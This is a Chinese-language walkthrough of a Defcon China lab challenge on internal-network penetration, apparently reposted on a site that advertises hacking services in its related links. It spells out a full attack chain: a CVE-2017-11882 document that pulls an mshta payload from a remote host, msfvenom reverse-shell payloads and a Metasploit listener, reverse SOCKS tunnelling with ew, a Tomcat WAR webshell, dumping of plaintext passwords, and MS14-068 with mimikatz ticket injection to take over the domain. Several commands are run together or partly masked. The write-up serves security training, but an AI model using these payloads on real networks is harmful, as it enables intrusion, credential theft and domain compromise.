Defcon China 靶场题 – 内网渗透Writeup

访客5年前关于黑客接单397

  Defcon China 靶场题 - 内网渗透Writeup

  对内网渗透的题目挺感兴趣的,所以做了一发。

  先给个拓扑图

  image.png

  http://192.168.1.2/是一个wordpress

  文件上传: http://192.168.1.2/wp-content/uploads/

  后台可admin/admin登录

  ssh可root/admin登录

  image.png

  从配置中看到有个文档web的配置

  image.png

  http的log日志可以看到,也有一个bot每隔一段时间会去请求

  image.png

  尝试用CVE-2017-11882打一波

  1、由于环境问题,先做ssh的端口转发

  ssh -CfNg -R 13339:127.0.0.1:13338 、生成一个hta文件

  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=13339 -f hta-psh -o a.hta3、生成恶意doc文件

  python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.2:8000/a.hta" -o test.doc4、msf监听端口上线

  use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 0.0.0.0set LPORT 13338exploit -j

  进入了192.168.2.1/24段

  image.png

  Get Flag.

  image.png

  添加路由

  run autoroute -s 192.168.2.1/24

  进行端口扫描

  use auxiliary/scanner/portscan/tcpset PORTS 3389,445,22,80,8080set RHoSTS 192.168.2.1/24set THREADS 50

  exploit

  由于msf是s4 *** ,还很慢,就使用ew来做

  先上传一下ew

  meterpreter > upload /media/psf/Home/ew.exe c:/Users/RTF/Desktop/linux,192.168.1.2做监听

  https://www.secpulse.com/archives/ew_for_linux64 -s rcsocks -l 10080 -e 8881windows,192.168.2.114反向连接c:/Users/RTF/Desktop/ew.exe -s rssocks -d 192.168.1.2 -e 8881

  对内网的192.168.2.104的web进行测试,但是没测出什么.

  image.png

  但是8080存在tomcat,默认账号密码可以进入,然后部署war包获得一个root权限的webshell

  image.png

  还有一个flag在,另外翻到数据库密码,连接进去看是有一个提示.

  /var/www/html/inc/config.php:$DB=new MyDB("127.0.0.1","mail","mail123456","my_mail");

  image.png

  爆破一发,发现可以进入192.168.2.112

  image.png

  做了端口转发登录3389,然后以管理员权限执行木马,上线

  image.png

  这里有一个问题就是,一开始只是拿到域内机器的本地administrator权限,所以是无法给域控发送一些请求信息,但是提升到system权限即可。

  看了一下pc机器的进程,发现是有域用户在上面。

  image.png

  抓一下明文密码

  image.png

  可以看到pc用户只是一个普通域用户

  image.png

  这里吐槽一下...赛题居然都不复现一下,一开始都没有任何域用户的提示信息,这个pc用户都是后面加上去的。

  确认一下域控位置是为\DC,因为remark备注了,所以比较明显

  image.png

  然后就是试一下ms14-068,参考《MS14-068 privilege escalation PoC》

  使用 *** :

  ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

  MS14-068.exe -u -s S-1-5-21-2251846888-1669908150-1970748206-1116 -d 192.168.2.10 -p

  其中域成员ad/pc的sid获取,先把进程切换了到了ad/pc权限下面,当然如果只是本地账号权限的话,可以用dsquery + dsget获取,另外注意域成员名@域名,后面的域名必须使用完整dns名称。

  image.png

  然后用mimikatz把凭证清空一下

  mimikatz.exe "kerberos::purge" "kerberos::list" "exit"

  然后注入一下凭证

  mimikatz.exe "kerberos::ptc "

  最后获取flag

  image.png

  know it then do it

相关文章

特工带黑客电影(特工a黑客设备放在哪)

特工带黑客电影(特工a黑客设备放在哪)

你觉得《黑客帝国》中的先知是人还是程序? 先知是一个很特别的程序。要理解这个程序的行事逻辑,那就得分析清楚整个《黑客帝国》系列到底讲了一个怎样的故事。在这篇文章里,我连推理带猜测地把整个故事的前因后果...

鲜为人知什么意思(“鲜为人知”不要说成“don't know")

昨日内容复习提要: 昨天学习了主要学习了 ①ashamed表示“羞愧”,从ashamed中学习构词法。②“尬聊”一般用哪个词。 昨天文章如下: ashamed表示“羞愧”,从ashamed中学习...

深圳高端商务服务联系方式

本次的內容为“深圳市高端商务服务项目联系电话”。好啦,和大伙儿简易的而言一下有关商女学妹的强制內容详细介绍吧,她们是怎样来开展商务来预测的呢?她们是怎样来分辨一个新项目?深圳市高端商务服务项目联系电话...

黑客软件破解qq手机版(黑客刷q币软件破解版)-网络黑客是什么是干什么的

黑客软件破解qq手机版(黑客刷q币软件破解版)-网络黑客是什么是干什么的

黑客软件破解qq手机版(黑客刷q币软件破解版)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑...

讯飞听见和讯飞语记有什么区别

讯飞听见和讯飞语记全是讯飞科技集团旗下的商品,在语音转换文字层面作用类似,可是二种商品的偏关键不一样,今日我就给大伙儿详细介绍讯飞听见和讯飞语记的不同点。 讯飞听见与讯飞语记有什么差别? 讯飞听见 开...

那里可以查向导删除聊天记录

  喀什地区疾病控制中心办公室主任王希江通告了疏附县肺炎疫情及进行新一轮dna检测情况:29日对疏附县举办第二次全体人员完全免费dna检测。终止19时,14人呈阳性,其他均为呈阴性。本次dna检测呈阳...